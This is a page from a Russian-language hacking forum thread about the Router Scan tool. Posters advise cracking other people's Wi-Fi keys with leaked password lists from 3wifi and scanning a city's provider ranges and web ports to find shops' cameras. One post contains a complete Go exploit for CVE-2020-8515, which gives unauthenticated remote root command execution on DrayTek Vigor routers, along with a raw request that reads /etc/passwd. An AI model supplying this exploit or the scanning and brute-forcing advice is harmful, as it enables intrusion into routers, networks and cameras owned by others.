прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    А к каким подходит генератор WPS пин?
    У меня получается ни к одной не подходит? :)
     
  2. zimmer

    zimmer Active Member

    Joined:
    19 Jun 2015
    Messages:
    135
    Likes Received:
    124
    Reputations:
    1
    попробуй сбрутить ключь (не пин) роутер сканом со встроеным пасслистом, не поможет, втыкай пасс лист побольше (в соседней теме стас переодически выкладывает выборку паролей с 3wifi) - довольно часто прокатывает (но не всегда)
     
  3. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ещё вот есть проблемка с роутер сканом,когда я вхожу в свою учетную запись в программе,то у меня выдаёт наподобие этого «не установлена связь с 3wifi,сгенерируйте на самом сайте» хотя интернет был в порядке
     
  4. mrHook

    mrHook Member

    Joined:
    19 Mar 2020
    Messages:
    10
    Likes Received:
    6
    Reputations:
    0
    В своем кабинете API ключ установил ?
     
    4Fun likes this.
  5. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ничего вроде не устанавливал,подскажите пожалуйста,где это находится?
    В программе или на сайте? :)
     
  6. mrHook

    mrHook Member

    Joined:
    19 Mar 2020
    Messages:
    10
    Likes Received:
    6
    Reputations:
    0
    1) на сайте кликнуть по своему нику
    2) перейдешь Управлением пользователем (твой Ник)
    3) найди API ключ ( чтение и запись) , если пусто нажми получить новый
    Все ( проверяешь на программе RS - не должно быть ошибок)
     
    4Fun likes this.
  7. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Спасибо,все помогло :)
     
  8. Vikhedgehog

    Vikhedgehog Elder - Старейшина

    Joined:
    24 Jul 2013
    Messages:
    358
    Likes Received:
    152
    Reputations:
    17
    RCE, DrayTek Vigor, CVE-2020-8515


    Code:
    package main
    
    
    /*
    CVE-2020-8515: DrayTek pre-auth remote root RCE
    Mon Mar 30 2020 -  0xsha.io
    Affected:
    DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,
    and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,
    and 1.4.4_Beta
    You should upgrade as soon as possible to 1.5.1 firmware or later
    This issue has been fixed in Vigor3900/2960/300B v1.5.1.
    read more :
    https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html
    https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
    https://thehackernews.com/2020/03/draytek-network-hacking.html
    https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
    exploiting using keyPath
    POST /cgi-bin/mainfunction.cgi HTTP/1.1
    Host: 1.2.3.4
    Content-Length: 89
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
     */
    
    import (
        "fmt"
        "io/ioutil"
        "net/http"
        "net/url"
        "os"
        "strings"
    )
    
    func usage()  {
    
        fmt.Println("CVE-2020-8515 exploit by  @0xsha ")
        fmt.Println("Usage :  " + os.Args[0] + " URL " + "command"  )
        fmt.Println("E.G :  " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\""  )
    }
    
    func main() {
    
    
        if len(os.Args) < 3 {
            usage()
            os.Exit(-1)
        }
    
        targetUrl := os.Args[1]
        //cmd := "cat /etc/passwd"
        cmd := os.Args[2]
    
    
        // payload preparation
        vulnerableFile := "/cgi-bin/mainfunction.cgi"
        // specially crafted CMD
        // action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
        payload :=`'
        /bin/sh -c 'CMD'
        '`
        payload = strings.ReplaceAll(payload,"CMD", cmd)
        bypass := strings.ReplaceAll(payload," ", "${IFS}")
    
        //PostForm call url encoder internally
        resp, err := http.PostForm(targetUrl+vulnerableFile ,
            url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"}   })
    
        if err != nil{
            fmt.Println("error connecting host")
            os.Exit(-1)
        }
    
    
        defer resp.Body.Close()
        body, err := ioutil.ReadAll(resp.Body)
        
        if err != nil{
            fmt.Println("error reading data")
            os.Exit(-1)
        }
        
        fmt.Println(string(body))
    
    }
     
  9. vova2106

    vova2106 New Member

    Joined:
    4 Apr 2020
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Это что?)
     
  10. zimmer

    zimmer Active Member

    Joined:
    19 Jun 2015
    Messages:
    135
    Likes Received:
    124
    Reputations:
    1
    TOX1C, binarymaster and 4Fun like this.
  11. Stalker5

    Stalker5 Member

    Joined:
    22 Feb 2013
    Messages:
    126
    Likes Received:
    12
    Reputations:
    0
    Подскажите плиз, как можно найти камеры местных магазинов?
    Мб какие-то конкретные диапазоны есть?
     
  12. zimmer

    zimmer Active Member

    Joined:
    19 Jun 2015
    Messages:
    135
    Likes Received:
    124
    Reputations:
    1
    у камер нет "конкретных диапозонов", просто сканируй диапозон провайдеров твоего города.
     
    TOX1C and binarymaster like this.
  13. Assatm

    Assatm New Member

    Joined:
    10 Mar 2020
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Ребята подскажите решение проблемы подключения к 3wifi service.
    В настройках прописал логин и пароль.
    2020-04-10 13_31_25-Error.png
    2020-04-10 13_32_02-Router Scan v2.60 Beta by Stas'M.png

    Так понимаю доступ закрыт?
    2020.03.17
    Гостевая учётная запись временно заблокирована, подробнее: https://forum.antichat.ru/posts/4370935
     
    #7393 Assatm, 10 Apr 2020
    Last edited: 10 Apr 2020
  14. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,557
    Likes Received:
    9,590
    Reputations:
    119
    Всё так.
     
    Piligrim740, TOX1C, Spinus and 2 others like this.
  15. Stalker5

    Stalker5 Member

    Joined:
    22 Feb 2013
    Messages:
    126
    Likes Received:
    12
    Reputations:
    0
    Порты какие лучше?
     
  16. zimmer

    zimmer Active Member

    Joined:
    19 Jun 2015
    Messages:
    135
    Likes Received:
    124
    Reputations:
    1
    80-89, 8000, 8080-8089, 8880-8889 навскидку для веб-интерфейса, но по сути сидеть могут на любом порту
     
    #7396 zimmer, 12 Apr 2020
    Last edited: 12 Apr 2020
    4Fun likes this.
  17. Stalker5

    Stalker5 Member

    Joined:
    22 Feb 2013
    Messages:
    126
    Likes Received:
    12
    Reputations:
    0
    Спасибо, попробую
     
  18. Stalker5

    Stalker5 Member

    Joined:
    22 Feb 2013
    Messages:
    126
    Likes Received:
    12
    Reputations:
    0
    Может есть какой-то чат где-то?

    В Телеграме в чате забанили непонятно за что
     
  19. zimmer

    zimmer Active Member

    Joined:
    19 Jun 2015
    Messages:
    135
    Likes Received:
    124
    Reputations:
    1
    причина же указывается бана... или ты нажал на /banmepls ?
     
  20. Stalker5

    Stalker5 Member

    Joined:
    22 Feb 2013
    Messages:
    126
    Likes Received:
    12
    Reputations:
    0
    Вроде не нажимал, а причину не указали - задал вопрос, пост удалили и в бан отправили(
     
Loading...